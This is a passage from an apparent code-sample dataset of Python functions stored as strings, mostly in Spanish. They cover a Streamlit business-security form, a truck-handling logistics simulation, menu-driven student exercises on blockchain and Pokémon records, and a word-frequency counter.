\n 'VENTA AL POR MAYOR DE METALES Y MINERALES METALÍFEROS', \n 'VENTA AL POR MAYOR DE ORDENADORES, EQUIPO PERIFÉRICO Y PROGRAMAS DE INFORMÁTICA', \n 'VENTA AL POR MAYOR DE OTROS ENSERES DOMÉSTICOS', \n 'VENTA AL POR MAYOR DE OTROS TIPOS DE MAQUINARIA Y EQUIPO', \n 'VENTA AL POR MAYOR DE PRODUCTOS TEXTILES, PRENDAS DE VESTIR Y CALZADO', \n 'VENTA AL POR MAYOR NO ESPECIALIZADA', \n 'VENTA AL POR MENOR DE ALIMENTOS EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE ALIMENTOS, BEBIDAS Y TABACO EN PUESTOS DE VENTA Y MERCADOS', \n 'VENTA AL POR MENOR DE APARATOS ELÉCTRICOS DE USO DOMÉSTICO, MUEBLES, EQUIPO DE ILUMINACIÓN Y OTROS ENSERES DOMÉSTICOS EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE ARTÍCULOS DE FERRETERÍA, PINTURAS Y PRODUCTOS DE VIDRIO EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE BEBIDAS EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE COMBUSTIBLES PARA VEHÍCULOS AUTOMOTORES EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE EQUIPO DE DEPORTE EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE EQUIPO DE SONIDO Y DE VÍDEO EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE LIBROS, PERIÓDICOS Y ARTÍCULOS DE PAPELERÍA EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE ORDENADORES, EQUIPO PERIFÉRICO, PROGRAMAS INFORMÁTICOS Y EQUIPO DE TELECOMUNICACIONES EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE OTROS PRODUCTOS EN PUESTOS DE VENTA Y MERCADOS', \n 'VENTA AL POR MENOR DE OTROS PRODUCTOS NUEVOS EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE PRENDAS DE VESTIR, CALZADO Y ARTÍCULOS DE CUERO EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE PRODUCTOS FARMACÉUTICOS Y MEDICINALES, COSMÉTICOS Y ARTÍCULOS DE TOCADOR EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE PRODUCTOS TEXTILES EN COMERCIOS ESPECIALIZADOS', \n 'VENTA AL POR MENOR DE PRODUCTOS TEXTILES, PRENDAS DE VESTIR Y CALZADO EN PUESTOS DE VENTA Y MERCADOS', \n 'VENTA AL POR MENOR EN COMERCIOS NO ESPECIALIZADOS CON PREDOMINIO DE LA VENTA DE ALIMENTOS, BEBIDAS O TABACO', \n 'VENTA AL POR MENOR POR CORREO Y POR INTERNET', \n #'VENTA DE VEHÍCULOS AUTOMOTORES' 128\n #'VENTA, MANTENIMIENTO Y REPARACIÓN DE MOTOCICLETAS Y DE SUS PARTES, PIEZAS Y ACCESORIOS.', \n #'VENTAS DE PARTES, PIEZAS Y ACCESORIOS PARA VEHÍCULOS AUTOMOTORES'\n ])\n Departament = st.sidebar.selectbox('Nombre del Departamento', ['AMAZONAS','AREQUIPA','ÁNCASH','APURÍMAC','AYACUCHO','HUANCAVELICA','HUÁNUCO','JUNÍN','MADRE DE DIOS','MOQUEGUA','PASCO','SAN MARTÍN','TACNA','TUMBES','UCAYALI','PUNO','LIMA','CALLAO','CUSCO','LA LIBERTAD','JUNÍN','CAJAMARCA','LAMBAYEQUE','LORETO'])\n Tama = st.sidebar.selectbox('Tamaño de Empresa', ['MICRO', 'PEQUEÑA','MEDIANA','GRANDE'])\n st.sidebar.header('Seguridad: No(0), Si(1))') \n F1 = st.sidebar.slider('Infraestructura física (alambrado, muros, etc.?', 0,1)\n F2 = st.sidebar.slider('Sistema de video y captura de imágenes?', 0,1)\n F3 = st.sidebar.slider('Sistema de control de acceso de personal?', 0,1)\n F4 = st.sidebar.slider('Sistema de alarma de seguridad electrónica?', 0,1)\n F5 = st.sidebar.slider('Seguridad para el traslado de valores?', 0,1)\n F6 = st.sidebar.slider('Seguridad para el traslado de bienes?', 0,1)\n F7 = st.sidebar.slider('Personal para resguardo (guardaespaldas)?',0,1)\n F8 = st.sidebar.slider('Personal de seguridad de bienes e inmuebles?', 0,1)\n \n features = {'acti2': acti2\t,\n 'Departament': Departament,\n 'Tama': Tama,\n 'F1': F1,\n 'F2': F2,\n 'F3': F3,\n 'F4': F4,\n 'F5': F5,\n 'F6': F6,\n 'F7': F7,\n 'F8': F8}\n data = pd.DataFrame(features,index=[0])\n\n return data", "def manipular_sacos(self, camion):\r\n operaciones = self.operaciones[\"Operaciones manipuleo\"]\r\n\r\n # Manipuleo de camion por cargar\r\n if camion.tipo == \"Carga\":\r\n\r\n # Espera camion para realizar transbordo o interrumpe la espera de otro\r\n ejecucion_espera_o_interrumpe = yield self.process(\r\n camion.espera_transbordo_o_interrumpe(self, 100))\r\n\r\n # Si el camion espera procede con un tranbordo o carga a pulso\r\n if ejecucion_espera_o_interrumpe[\"Resultado\"] != \"Interrumpio espera\":\r\n transbordo = operaciones[\"Transbordo a pulso - Sacos\"]\r\n carga = operaciones[\"Carga a pulso - Sacos\"]\r\n\r\n yield self.process(self.transbordar_o_cargar_descargar(\r\n camion, ejecucion_espera_o_interrumpe,\r\n transbordo, 200,\r\n carga, self.medios_almacenamiento[\"Almacen 2\"], 200))\r\n\r\n # Manipuleo de camion por descargar\r\n elif camion.tipo == \"Descarga\":\r\n\r\n # Espera camion para realizar transbordo o interrumpe la espera de otro\r\n ejecucion_espera_o_interrumpe = yield self.process(\r\n camion.espera_transbordo_o_interrumpe(self, 100))\r\n\r\n # Si el camion espera procede con un tranbordo o descarga a pulso\r\n if ejecucion_espera_o_interrumpe[\"Resultado\"] != \"Interrumpio espera\":\r\n transbordo = operaciones[\"Transbordo a pulso - Sacos\"]\r\n descarga = operaciones[\"Descarga a pulso - Sacos\"]\r\n\r\n yield self.process(self.transbordar_o_cargar_descargar(\r\n camion, ejecucion_espera_o_interrumpe,\r\n transbordo, 200,\r\n descarga, self.medios_almacenamiento[\"Almacen 2\"], 200))", "def intro():\r\n\r\n print(term.home + term.on_white + term.clear)\r\n Joueur_1 = input(term.black + 'Pseudo joueur 1 : ')\r\n Joueur_2 = input(term.black + 'Pseudo joueur 2 : ')\r\n print (term.black + 'Que le meilleur gagne!')\r\n print (term.black + '**********************')", "def load():\n messagebox.showinfo(\"Information\", \"Veuillez entrer le nom du fichier dans la console.\")\n file_name = input(\"Nom du fichier : \")\n ferme_fenetre()\n Hitori(file_name)", "def agregar_bolsa(self, letra, cantidad):", "def archivos_de_texto():\n palabra = \"\" \n palabras_candidatas = [] #lista donde se guardara las palabras candidatas de cada linea\n palabra_cantidad = {} #diccionario con la palabra candidata de clave y las veces que esta repetida en cada texto de valor\n with open(\"Cuentos.txt\",\"r\") as Cuentos: \n for linea_Cuentos in Cuentos: #cada ciclo del for es una linea del texto\n for caracter in linea_Cuentos: #cada ciclo del for es una caracter de la linea \n if caracter.isalpha():\n caracter = quitar_tilde_y_may(caracter) #se transformas caracteres mayusculas y tildes\n palabra += caracter #cada caracter ira formando la palabra\n if not caracter.isalpha():\n if len(palabra) >= 5: #se analiza que la palabra tenga 5 o mas caracteres\n palabras_candidatas.append(palabra) \n palabra = \"\" #se vacia la palabra ya analizada\n for palabra_en_lista in palabras_candidatas: #se introduce las palabras candidatas a un diccionario\n if palabra_en_lista not in palabra_cantidad:\n palabra_cantidad[palabra_en_lista] = [1,0,0]\n else:\n palabra_cantidad[palabra_en_lista] = [int(palabra_cantidad[palabra_en_lista][0]) + 1 , 0, 0]\n palabras_candidatas = []\n with open(\"La araña negra - tomo 1.txt\",\"r\") as La_arana_negra:#se repite el mismo proceso con los otros dos textos\n for linea_Cuentos in La_arana_negra:\n for caracter in linea_Cuentos:\n if caracter.isalpha():\n caracter = quitar_tilde_y_may(caracter)\n palabra += caracter\n if not caracter.isalpha():\n if len(palabra) >= 5:\n palabras_candidatas.append(palabra)\n palabra = \"\"\n for palabra_en_lista in palabras_candidatas:\n if palabra_en_lista not in palabra_cantidad:\n palabra_cantidad[palabra_en_lista] = [0,1,0]\n else:\n palabra_cantidad[palabra_en_lista] = [palabra_cantidad[palabra_en_lista][0] , int(palabra_cantidad[palabra_en_lista][1]) + 1, 0]\n palabras_candidatas = [] \n with open(\"Las 1000 Noches y 1 Noche.txt\",\"r\") as muchas_noches: \n for linea_Cuentos in muchas_noches:\n for caracter in linea_Cuentos:\n if caracter.isalpha():\n caracter = quitar_tilde_y_may(caracter)\n palabra += caracter\n if not caracter.isalpha():\n if len(palabra) >= 5:\n palabras_candidatas.append(palabra)\n palabra = \"\"\n for palabra_en_lista in palabras_candidatas:\n if palabra_en_lista not in palabra_cantidad:\n palabra_cantidad[palabra_en_lista] = [0,0,1]\n else:\n palabra_cantidad[palabra_en_lista] = [palabra_cantidad[palabra_en_lista][0] ,palabra_cantidad[palabra_en_lista][1], int(palabra_cantidad[palabra_en_lista][2]) + 1]\n palabras_candidatas = [] \n palabra_cantidad = dict(sorted(palabra_cantidad.items())) #se ordena el diccionario alfabeticamente\n with open(\"palabras.csv\",\"w\") as palabras_csv: # se agrga el diccionario a un arcivo .csv\n for palabra in palabra_cantidad:\n palabras_csv.write(palabra)\n palabras_csv.write(\",\")\n palabras_csv.write(str(palabra_cantidad[palabra][0]))\n palabras_csv.write(\",\")\n palabras_csv.write(str(palabra_cantidad[palabra][1]))\n palabras_csv.write(\",\")\n palabras_csv.write(str(palabra_cantidad[palabra][2]))\n palabras_csv.write(\"\\n\")\n return palabra_cantidad", "def apilar(pila, dato):\n pila.tope += 1\n pila.datos[pila.tope] = dato", "def iniciar_aplicacion():\n continuar = True\n blockchain = []\n while continuar:\n mostrar_menu()\n opcion_seleccionada = int(input(\"Por favor seleccione una opción: \"))\n if opcion_seleccionada == 1:\n blockchain = ejecutar_cargar_blockchain_cupicoin()\n elif opcion_seleccionada == 2:\n ejecutar_agregar_transaccion(blockchain)\n elif opcion_seleccionada == 3:\n ejecutar_agregar_nuevo_bloque(blockchain)\n elif opcion_seleccionada == 4:\n ejecutar_contar_veces_aparece_cuenta(blockchain)\n elif opcion_seleccionada == 5:\n ejecutar_buscar_transaccion(blockchain)\n elif opcion_seleccionada == 6:\n ejecutar_validar_bloque(blockchain)\n elif opcion_seleccionada == 7:\n ejecutar_dar_transacciones_entre(blockchain)\n elif opcion_seleccionada == 8:\n ejecutar_dar_transferencia_mayor_valor(blockchain)\n elif opcion_seleccionada == 9:\n ejecutar_calcular_saldo_cuenta(blockchain)\n elif opcion_seleccionada == 10:\n continuar = False\n else:\n print(\"Por favor seleccione una opción válida.\")", "def main():\n\tmain_menu_title = txt_sns + \"\\nBIENVENIDO AL SANSANITO POKEMON. QUE DESEA HACER?\\n\"\n\t# Opciones de menu principal\n\tmain_menu_items = [\"Crear un registro (create)\", \"Ingresar un pokemon\", \"Buscar en tabla (read)\", \"Opciones especiales de busqueda\",\\\n\t\t\t\t\t\t\"Cambiar datos de pokemon ingresado (update)\", \"Borrar registro (delete)\",\\\n\t\t\t\t\t\t\"Ver la tabla Poyo\", \"Ver la tabla Sansanito Pokemon\", \"Capacidad actual\", \"Salir\"]\n\tmain_menu_cursor = \"> \"\n\tmain_menu_cursor_style = (\"fg_red\", \"bold\")\n\tmain_menu_style = (\"bg_purple\", \"fg_yellow\")\n\tmain_menu_exit = False\n\n\tmain_menu = TerminalMenu(menu_entries=main_menu_items,\n\t\t\t\t\t\t\t title=main_menu_title,\n\t\t\t\t\t\t\t menu_cursor=main_menu_cursor,\n\t\t\t\t\t\t\t menu_cursor_style=main_menu_cursor_style,\n\t\t\t\t\t\t\t menu_highlight_style=main_menu_style,\n\t\t\t\t\t\t\t cycle_cursor=True,\n\t\t\t\t\t\t\t clear_screen=True)\n\n\twhile not main_menu_exit:\n\t\tmain_sel = main_menu.show()\n\t\tsubmenu_flag = True\n\t\t# Create de CRUD y Ingresar pokemon\n\t\tif main_sel == 0 or main_sel == 1:\n\t\t\tsubmenu_flag = False\n\t\t\tprint(\"TABLA ORIGINAL:\")\n\t\t\tprint_sansanito()\n\t\t\tcreate()\n\t\t\tprint(\"\\nTABLA FINAL:\")\n\t\t\tprint_sansanito()\n\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\tcondicion = input()\n\t\t\twhile(condicion != \"X\" and condicion != \"x\"):\n\t\t\t\tcondicion = input()\n\n\t\telif main_sel == 2:\n\t\t\tmenu1_title = \"BUSQUEDA DE REGISTRO EN SANSANITO POKEMON\\n\"\n\t\t\tmenu1_items = [\"Buscar por ID\", \"Salir\"]\n\t\t\tmenu1 = TerminalMenu(menu_entries=menu1_items,\n\t\t\t\t\t\t\t title=menu1_title,\n\t\t\t\t\t\t\t menu_cursor=main_menu_cursor,\n\t\t\t\t\t\t\t menu_cursor_style=main_menu_cursor_style,\n\t\t\t\t\t\t\t menu_highlight_style=main_menu_style,\n\t\t\t\t\t\t\t cycle_cursor=True,\n\t\t\t\t\t\t\t clear_screen=True)\n\t\t\twhile submenu_flag:\n\t\t\t\tmenu1_sel = menu1.show()\n\t\t\t\tif menu1_sel == 0:\n\t\t\t\t\tread()\n\t\t\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\t\t\tcondicion = input()\n\t\t\t\t\twhile(condicion != \"X\" and condicion != \"x\"):\n\t\t\t\t\t\tcondicion = input()\n\t\t\t\telif menu1_sel == 1:\n\t\t\t\t\tsubmenu_flag = False \n\n\t\telif main_sel == 3:\n\t\t\tmenu2_title = \"BUSQUEDA ESPECIAL EN SANSANITO POKEMON. ELIGA UNA OPCION.\\n\"\n\t\t\tmenu2_items = [\"10 pokemon con mayor prioridad\", \"10 pokemon con menor prioridad\",\\\n\t\t\t\"Pokemon con estado especifico\", \"Pokemon legendarios ingresados\",\\\n\t\t\t\"Pokemon que lleva mas tiempo ingresado\", \"Pokemon mas repetido\",\\\n\t\t\t\"Pokemon ingresados, ordenados por su prioridad\", \"Salir\"]\n\t\t\tmenu2 = TerminalMenu(menu_entries=menu2_items,\n\t\t\t\t\t\t\t\ttitle=menu2_title,\n\t\t\t\t\t\t\t\tmenu_cursor=main_menu_cursor,\n\t\t\t\t\t\t\t\tmenu_cursor_style=main_menu_cursor_style,\n\t\t\t\t\t\t\t\tmenu_highlight_style=main_menu_style,\n\t\t\t\t\t\t\t\tcycle_cursor=True,\n\t\t\t\t\t\t\t\tclear_screen=True)\n\t\t\twhile submenu_flag:\n\t\t\t\tmenu2_sel = menu2.show()\n\t\t\t\t# 10 con mayor prioridad\n\t\t\t\tif menu2_sel == 0:\n\t\t\t\t\tmaxprio_sansanito()\n\t\t\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\t\t\tcondicion = input()\n\t\t\t\t\twhile(condicion != \"X\" and condicion != \"x\"):\n\t\t\t\t\t\tcondicion = input()\n\t\t\t\t# 10 con menor prioidad\n\t\t\t\telif menu2_sel == 1:\n\t\t\t\t\tminprio_sansanito()\n\t\t\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\t\t\tcondicion = input()\n\t\t\t\t\twhile(condicion != \"X\" and condicion != \"x\"):\n\t\t\t\t\t\tcondicion = input()\n\t\t\t\t# Filtrado por estado\n\t\t\t\telif menu2_sel == 2:\n\t\t\t\t\tprint(\"NOTA: Estados disponibles son: Envenenado, Paralizado, Quemado, Dormido, Congelado\")\n\t\t\t\t\tprint(\"Para ver pokemons sin estado, ingrese X.\\n\")\n\t\t\t\t\testado = input(\"Ingrese un estado para filtrar los datos: \")\n\t\t\t\t\tif estado.upper() == \"X\":\n\t\t\t\t\t\testado = None\n\t\t\t\t\testado_sansanito(estado)\n\t\t\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\t\t\tcondicion = input()\n\t\t\t\t\twhile(condicion != \"X\" and condicion != \"x\"):\n\t\t\t\t\t\tcondicion = input()\n\t\t\t\t# Los legendarios ingresados\n\t\t\t\telif menu2_sel == 3:\n\t\t\t\t\tlegendarios_sansanito()\n\t\t\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\t\t\tcondicion = input()\n\t\t\t\t\twhile(condicion != \"X\" and condicion != \"x\"):\n\t\t\t\t\t\tcondicion = input()\n\t\t\t\t# El mas antiguo\n\t\t\t\telif menu2_sel == 4:\n\t\t\t\t\tantiguedad_sansanito()\n\t\t\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\t\t\tcondicion = input()\n\t\t\t\t\twhile(condicion != \"X\" and condicion != \"x\"):\n\t\t\t\t\t\tcondicion = input()\n\t\t\t\t# Pokemon mas repetido\n\t\t\t\telif menu2_sel == 5:\n\t\t\t\t\trepetido_sansanito()\n\t\t\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\t\t\tcondicion = input()\n\t\t\t\t\twhile(condicion != \"X\" and condicion != \"x\"):\n\t\t\t\t\t\tcondicion = input()\n\t\t\t\t# Ordenados por prioidad\n\t\t\t\telif menu2_sel == 6:\n\t\t\t\t\torden = input(\"Ingrese 1 si desea el orden DESCENDIENTE, 0 en caso contrario: \")\n\t\t\t\t\tif orden != \"1\" and orden != \"0\":\n\t\t\t\t\t\tprint(\"Input invalido! Intente de nuevo.\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tif orden == \"1\":\n\t\t\t\t\t\t\tordenado_sansanito(\"DESC\")\n\t\t\t\t\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\t\t\t\t\tcondicion = input()\n\t\t\t\t\t\t\twhile(condicion != \"X\" and condicion != \"x\"):\n\t\t\t\t\t\t\t\tcondicion = input()\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tordenado_sansanito(\"ASC\")\n\t\t\t\t\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\t\t\t\t\tcondicion = input()\n\t\t\t\t\t\t\twhile(condicion != \"X\" and condicion != \"x\"):\n\t\t\t\t\t\t\t\tcondicion = input()\n\t\t\t\telif menu2_sel == 7:\n\t\t\t\t\tsubmenu_flag = False\n\t\telif main_sel == 4:\n\t\t\tupdate()\n\t\t# Delete de CRUD\n\t\telif main_sel == 5:\n\t\t\ta_borrar = int(input(\"Ingrese el ID de registro a borrar: \"))\n\t\t\tdelete(a_borrar)\n\t\t\ttime.sleep(1)\n\t\t# Muestra la tabla de poyo\n\t\telif main_sel == 6:\n\t\t\tprint_poyo()\n\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\tcondicion = input()\n\t\t\twhile(condicion.upper() != \"X\"):\n\t\t\t\tcondicion = input()\n\t\t# Muestra la tabla de sansanito\n\t\telif main_sel == 7:\n\t\t\tprint_sansanito()\n\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\tcondicion = input()\n\t\t\twhile(condicion.upper() != \"X\"):\n\t\t\t\tcondicion = input()\n\t\t# Funcion extra que muestra la ocupacion actual de sansanito\n\t\telif main_sel == 8:\n\t\t\tprint(\"La capacidad actual es: {}/50\".format(calcular_ocupacion()))\n\t\t\tprint(\"Ingrese X para volver al MENU PRINCIPAL.\")\n\t\t\tcondicion = input()\n\t\t\twhile(condicion != \"X\" and condicion != \"x\"):\n\t\t\t\tcondicion = input()\n\t\t# Salir\n\t\telif main_sel == 9:\n\t\t\tmain_menu_exit = True", "def cargaAutoStr(pila):\n while not pila_llena(pila):\n largo = random.randint(1, 15)\n apilar(pila, randString(largo))", "def menu():\n menu = int(input(\"1 para carga TLK \\n 2 Para carga zbx \\n 3 para ambos \\n\"))\n if menu == 1:\n orquestador_tlk()\n elif menu == 2:\n orquestador_zbx()\n elif menu == 3:\n orquestador_tlk()\n orquestador_zbx()", "def manipular_granos(self, camion):\r\n operaciones = self.operaciones[\"Operaciones manipuleo\"]\r\n operaciones_complementarias = self.operaciones[\"Operaciones complementarias\"]\r\n\r\n # Manipuleo de camion por cargar\r\n if camion.tipo == \"Carga\":\r\n\r\n # Manipuleo de carga a granel seca en almacenes propios\r\n if camion.carga in [\"Harina de Soya - Hi Pro/Pellet de Soya\"]:\r\n\r\n # Si la cola de la tolva es aceptable, o si la cola de la pala mecanica y de las cuadrillas\r\n # son muy largas, o si no se dispone producto en almacen 1, entonces, se trata de cargar a\r\n # partir de un transbordo en sistema mecanizado\r\n if len(self.recursos_atencion[\"Estacion Tolva/Balanza 3\"].cola) <= 10 \\\r\n or (len(operaciones[\"Carga con pala mecanica\"].recurso.cola) > 10 and\r\n len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) > 8) \\\r\n or not camion.dispone_producto_espacio_medio_almacenamiento(\r\n self.medios_almacenamiento[\"Almacen 1\"]):\r\n\r\n transbordo = operaciones[\"Transbordo en sistema mecanizado (C)\"]\r\n ejecucion_transbordo = yield self.process(\r\n transbordo.ejecutar(self, camion, 30, self.medios_almacenamiento[\"Tolva\"]))\r\n\r\n # Si no se ejecuta el transbordo, se trata de cargar el camion tomando otras alternativoas\r\n # bajo un orden de prioridad definida a continuación\r\n if ejecucion_transbordo in [\"No ejecutada por recurso\", \"No ejecutada por producto\"]:\r\n\r\n # Si la cola de la pala mecanica es aceptable o la cola de las cuadrillas es muy larga,\r\n # y se dispone producto en almacenes, entonces, se carga con pala mecanica\r\n if (len(operaciones[\"Carga con pala mecanica\"].recurso.cola) <= 10 or\r\n len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) > 8) \\\r\n and camion.dispone_producto_espacio_medio_almacenamiento(\r\n self.medios_almacenamiento[\"Almacen 1\"]):\r\n\r\n yield self.process(operaciones_complementarias[\"Primer pesaje - B3\"]\r\n .ejecutar(self, camion))\r\n\r\n carga = operaciones[\"Carga con pala mecanica\"]\r\n yield self.process(\r\n carga.ejecutar(\r\n self, camion, medio_de_almacenamiento=self.medios_almacenamiento[\"Almacen 1\"]))\r\n\r\n yield self.process(operaciones_complementarias[\"Segundo pesaje - B3\"]\r\n .ejecutar(self, camion))\r\n\r\n # En otro caso, si la cola de las cuadrillas es aceptable y se dipone producto en almacenes,\r\n # entonces, se transborda o carga a pulso\r\n elif len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) <= 8 \\\r\n and camion.dispone_producto_espacio_medio_almacenamiento(\r\n self.medios_almacenamiento[\"Almacen 1\"]):\r\n\r\n yield self.process(operaciones_complementarias[\"Primer pesaje - B3\"]\r\n .ejecutar(self, camion))\r\n\r\n transbordo = operaciones[\"Transbordo a pulso - Granos\"]\r\n carga = operaciones[\"Carga a pulso - Granos\"]\r\n\r\n ejecucion_espera_o_interrumpe = yield self.process(\r\n camion.espera_transbordo_o_interrumpe(self, 0))\r\n\r\n if ejecucion_espera_o_interrumpe[\"Resultado\"] != \"Interrumpio espera\":\r\n yield self.process(self.transbordar_o_cargar_descargar(\r\n camion, ejecucion_espera_o_interrumpe,\r\n transbordo, float(\"Inf\"),\r\n carga, self.medios_almacenamiento[\"Almacen 1\"], float(\"Inf\")))\r\n\r\n yield self.process(operaciones_complementarias[\"Segundo pesaje - B3\"]\r\n .ejecutar(self, camion))\r\n\r\n # En otro caso, si al menos se dispone producto en almacenes, entonces,\r\n # se carga con tolva desde almacen.\r\n elif camion.dispone_producto_espacio_medio_almacenamiento(\r\n self.medios_almacenamiento[\"Almacen 1\"]):\r\n\r\n carga = operaciones[\"Carga con tolva\"]\r\n yield self.process(\r\n carga.ejecutar(\r\n self, camion, medio_de_almacenamiento=self.medios_almacenamiento[\"Almacen 1\"]))\r\n\r\n # Si ningun caso anterior fue satisfecho se genera y muestra un error\r\n else:\r\n print \"\\tERROR \" + str(camion) + \" NO FUE MANIPULADO - Hora:\" + str(self.now)\r\n\r\n # En otro caso, si la cola de la pala mecánica es aceptable o la cola de las cuadrillas es muy larga,\r\n # entonces, se carga con pala mecanica.\r\n elif len(operaciones[\"Carga con pala mecanica\"].recurso.cola) <= 10 \\\r\n or len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) > 8:\r\n\r\n yield self.process(operaciones_complementarias[\"Primer pesaje - B3\"]\r\n .ejecutar(self, camion))\r\n\r\n carga = operaciones[\"Carga con pala mecanica\"]\r\n yield self.process(\r\n carga.ejecutar(\r\n self, camion, medio_de_almacenamiento=self.medios_almacenamiento[\"Almacen 1\"]))\r\n\r\n yield self.process(operaciones_complementarias[\"Segundo pesaje - B3\"].ejecutar(self, camion))\r\n\r\n # En otro caso, si la cola de cuadrillas es aceptable, entonces, se transborda o carga a pulso.\r\n elif len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) <= 8:\r\n\r\n yield self.process(operaciones_complementarias[\"Primer pesaje - B3\"]\r\n .ejecutar(self, camion))\r\n\r\n # Si no hay posibilidad de que arriben camiones para transbordo, se carga a pulso\r\n if len(self.recursos_atencion[\"Estacion Volcadora\"].cola) > 10 \\\r\n and len(self.recursos_atencion[\"Cuadrilla de Estibaje\"].cola) <= 8:\r\n carga = operaciones[\"Carga a pulso - Granos\"]\r\n yield self.process(\r\n carga.ejecutar(\r\n self, camion, medio_de_almacenamiento=self.medios_almacenamiento[\"Almacen 1\"]))\r\n\r\n # En caso contrario, se transborda o carga a pulso\r\n else:\r\n transbordo = operaciones[\"Transbordo a pulso - Granos\"]\r\n carga = operaciones[\"Carga a pulso - Granos\"]\r\n\r\n ejecucion_espera_o_interrumpe = yield self.process(\r\n camion.espera_transbordo_o_interrumpe(self, 10))\r\n\r\n if ejecucion_espera_o_interrumpe[\"Resultado\"] != \"Interrumpio espera\":\r\n yield self.process(self.transbordar_o_cargar_descargar(\r\n camion, ejecucion_espera_o_interrumpe,\r\n transbordo, float(\"Inf\"),\r\n carga, self.medios_almacenamiento[\"Almacen 1\"], float(\"Inf\")))\r\n\r\n yield self.process(operaciones_complementarias[\"Segundo pesaje - B3\"]\r\n .ejecutar(self, camion))\r\n\r\n # Si ningun caso anterior fue satisfecho se genera y muestra un error\r\n else:\r\n print \"\\tERROR \" + str(camion) + \" NO FUE MANIPULADO - Hora:\" + str(self.now)\r\n\r\n # Manipuleo de carga a granel seca en almacenes externos\r\n elif camion.carga in [\"Grano de Soya\"]:\r\n\r\n # Si se dispone algún camion esperando por transbordo, entonces,\r\n # se interrumpe su espera y se transborda a pulso\r\n if camion.dispone_camion_esperando_camion(self):\r\n\r\n ejecucion_espera_o_interrumpe = yield self.process(\r\n camion.espera_transbordo_o_interrumpe(self, 0))\r\n\r\n # Si el camion espera se genera y muestra un error\r\n if ejecucion_espera_o_interrumpe[\"Resultado\"] != \"Interrumpio espera\":\r\n print \"\\tERROR \" + str(camion) + \" NO FUE MANIPULADO - Hora:\" + str(self.now)\r\n\r\n # En caso contrario, si la pala mecanica tiene una cola aceptable o la cola de las cuadrillas\r\n # es muy larga, entonces, se carga con pala mecanica\r\n elif len(self.recursos_atencion[\"Pala Mecanica\"].cola) <= 10 \\\r\n or len(self.recursos_atencion[\"Pala Mecanica\"].cola) > 8:\r\n\r\n carga = operaciones[\"Carga con pala mecanica\"]\r\n yield self.process(\r\n carga.ejecutar(\r\n self, camion, medio_de_almacenamiento=self.medios_almacenamiento[\"Almacen Ext\"]))\r\n\r\n # Si la cola de la pala mecanica es muy larga y la de las cuadrillas es aceptable,\r\n # entonces, tenemos dos casos:\r\n else:\r\n\r\n # Si se dispone producto, se transborda o carga a pulso con poca paciencia\r\n if camion.dispone_producto_espacio_medios_almacenamiento(self):\r\n ejecucion_espera_o_interrumpe = yield self.process(\r\n camion.espera_transbordo_o_interrumpe(self, 10))\r\n\r\n # Si el camion espero se procede con un tranbordo o carga a pulso\r\n if ejecucion_espera_o_interrumpe[\"Resultado\"] != \"Interrumpio espera\":\r\n transbordo = operaciones[\"Transbordo a pulso - Granos\"]\r\n carga = operaciones[\"Carga a pulso - Granos\"]\r\n\r\n yield self.process(self.transbordar_o_cargar_descargar(\r\n camion, ejecucion_espera_o_interrumpe,\r\n transbordo, float(\"Inf\"),\r\n carga, self.medios_almacenamiento[\"Almacen Ext\"], float(\"Inf\")))\r\n\r\n # Si no se dispone producto, se transborda o carga a pulso con mayor paciencia\r\n else:\r\n ejecucion_espera_o_interrumpe = yield self.process(\r\n camion.espera_transbordo_o_interrumpe(self, 30))\r\n\r\n # Si el camion espero se procede con un tranbordo o carga a pulso\r\n if ejecucion_espera_o_interrumpe[\"Resultado\"] != \"Interrumpio espera\":\r\n transbordo = operaciones[\"Transbordo a pulso - Granos\"]\r\n carga = operaciones[\"Carga a pulso - Granos\"]\r\n\r\n yield self.process(self.transbordar_o_cargar_descargar(\r\n camion, ejecucion_espera_o_interrumpe,\r\n transbordo, float(\"Inf\"),\r\n carga, self.medios_almacenamiento[\"Almacen Ext\"], float(\"Inf\")))\r\n\r\n # Manipuleo de camion por descargar\r\n elif camion.tipo == \"Descarga\":\r\n\r\n # Manipuleo de carga a granel en almacenes propios\r\n if camion.carga in [\"Harina de Soya - Hi Pro/Pellet de Soya\"]:\r\n\r\n # Si se dispone espacio en Tolva y, la cola de la volcadora es aceptable o la cola de cuadrillas\r\n # es muy larga, entonces, se descarga a partir de un transbordo en sistema mecanizado.\r\n if (camion.dispone_producto_espacio_medio_almacenamiento(\r\n self.medios_almacenamiento[\"Tolva\"]) or\r\n not camion.dispone_producto_espacio_medio_almacenamiento(\r\n 